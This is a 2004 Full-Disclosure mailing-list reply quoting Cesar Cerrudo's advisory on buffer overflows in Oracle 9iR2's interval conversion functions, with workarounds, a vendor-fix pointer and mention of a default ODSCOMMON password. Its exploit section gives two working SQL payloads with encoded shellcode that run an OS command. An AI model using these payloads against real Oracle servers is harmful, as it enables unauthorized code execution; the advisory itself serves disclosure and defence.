Re: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

[Chris Anley <chris () ngssoftware com>]

Hey Cesar.

These are known bugs.

We (NGS) found and reported them last year. As you say, Oracle has
already fixed them and released a patch. Check out

http://www.nextgenss.com/research.html

...where we posted advisories on these bugs in December, along with
another couple in from_tz and time_zone. We've historically found a lot
of issues in Oracle, so if you want to eliminate the stuff that's already
fixed from your list of 60+ issues it's a good place to look; the fine
detail isn't always available in the Oracle alerts.

     -chris.


On Thu, 5 Feb 2004, Cesar wrote:

> Security Advisory
>
> Name:  Oracle Database 9ir2 Interval Conversion
> Functions Buffer Overflow.
> System Affected :  Oracle Database 9ir2, previous
> versions could be affected too.
> Severity :  High
> Remote exploitable : Yes
> Author:    Cesar Cerrudo.
> Date:    02/05/04
> Advisory Number:    CC020401
>
>
> Legal Notice:
>
> This Advisory is Copyright (c) 2003 Cesar Cerrudo.
> You may distribute it unmodified and for free. You may
> NOT modify it and distribute it or distribute
> parts of it without the author's written permission.
> You may NOT use it for commercial intentions
> (this means include it in vulnerabilities databases,
> vulnerabilities scanners, any paid service,
> etc.) without the author's written permission. You are
> free to use Oracle details for commercial intentions.
>
>
> Disclaimer:
>
> The information in this advisory is believed to be
> true though it may be false.
> The opinions expressed in this advisory are my own and
> not of any company. The usual standard
> disclaimer applies, especially the fact that Cesar
> Cerrudo is not liable for any damages caused
> by direct or indirect use of the information or
> functionality provided by this advisory.
> Cesar Cerrudo bears no responsibility for content or
> misuse of this advisory or any derivatives thereof.
>
>
>
> !!!!!!!!!!!ALERT!!!!!!!!!!!:
>
> Oracle was contacted about these vulnerabilities, but
> their Security Response Team is one of the worst that
> i have deal with, they don't care about security and
> they don't even follow OISafety rules(Oracle is a
> member).
> Because this reason we only have told to Oracle about
> just a couple of bugs, i think i won't contact them
> anymore,
> or maybe if i get a letter from Larry Ellison asking
> for apologies...:).
> Anyways if Oracle would spend more money on security
> than in marketing saying that their products are
> unbreakable
> everything would be different. Right now Oracle
> database server and other Oracle products are some
> kind of backdoor.
> These vulnerabilities are just only a bit of +60 that
> we have identified (yes more than 60 issues and
> most of these issues can be exploited by any low
> privileged user to take complete control over the
> database and probably OS, also for some of them there
> aren't any workarounds). If you are running Oracle i
> recomend you to start praying to not being hacked and
> to start complaining to Oracle to improve the quality
> of
> their products and to release patches.
>
> BTW: if someone from Oracle dares to say that i'm not
> telling the true, then probably i will release all the
> holes
> information to shut their mouths.
>
> Some workaround to protect your Oracle servers until
> maybe next year when Oracle probably could fix their
> buggy
> database server:
>
> -Check packages permissions and remove public
> permission, set minimal permissions
> that fit your needs.
> -Check Directory Objects permissions and remove public
> permission, set minimal permissions
> that fit your need, remove Directory Objecs if not
> used.
> -Restrict users to execute directly PL/SQL statements
> over the server.
> -Periodically audit users permissions on all database
> objects.
> -Lock users that aren't used.
> -Change default passwords.
> If you want automation, i really like AppDetective for
> Oracle:
> http://www.appsecinc.com/products/appdetective/oracle/
>
>
> Overview:
>
> Oracle Database Server is one of the most used
> database servers in the world, it was marketed
> as being unbreakable and many people thinks that is
> one of the most secure database server in
> the market. Larry Ellison (Oracle CEO) says that
> Oracle is used by NSA, CIA, russian intelligence,
> goverments, etc.
> (www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
> so it must be really secure!!!
> Oracle Database Server provides two functions that can
> be used with PL/SQL to convert numbers
> to date/time intervals, these functions have buffer
> overflow vulnerebilities.
>
>
>
> Details:
>
> When any of these conversion funcions are called with
> a long string as a second
> parameter a buffer overflow occurs.
>
> To reproduce the overflow execute the next PL/SQL:
>
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
>
> SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
>
>
>
> This vulnerability can be exploited by any Oracle
> Database user because access to these
> functions can't be restricted.
> Explotation of this vulnerability allow an attacker to
> execute arbitrary code, also it
> can be exploited to cause DOS (Denial of service)
> killing Oracle server process. An attacker can
> complete compromise the OS and database if Oracle is
> running on Windows plataform, because Oracle must
> run under the local System account or under an
> administrative account. If Oracle is running on *nix
> then only the database could be compromised because
> Oracle runs mostly under oracle user which has
> restricted
> permissions.
> Important!: Explotation of these vulnerabilities
> becomes easy if Oracle Internet Directory has
> been deployed, because Oracle Internet Directory
> creates a database user called ODSCOMMON that
> has a default password ODSCOMMON (Unbreakable???,
> hahaha, please take a look at this
>
> http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
> this password can not be changed,
> so any attacker can use this user to connect to
> database and exploit these vunerabilities.
>
>
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and Linux confirm these
> vulnerabilities,
> versions running in other OS plataforms are believed
> to be affected too.
> Previous Oracle Database Server versions could be
> affected by these vulnerabilities.
>
>
>
> Exploits:
>
> --these exploits should work on W2K Server and WinXp,
> not tested on Win2003.
> --run any command at the end of the string
> SELECT
> NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
>
> chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
>
> 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
> ARE YOU SURE? >c:\Unbreakable.txt')
>
> FROM DUAL;
>
> SELECT
> NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
>
> chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
>
> 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
> ARE YOU SURE? >c:\Unbreakable.txt')
>
> FROM DUAL;
>
>
>
> Vendor Fix:
>
> Go to Oracle Metalink site, http://metalink.oracle.com
>
>
> Vendor Contact:
>
> Oracle was contacted and they released a fix without
> telling me nor the public anything and without issuing
> an alert.
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! Finance: Get your refund fast by filing online.
> http://taxes.yahoo.com/filing.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html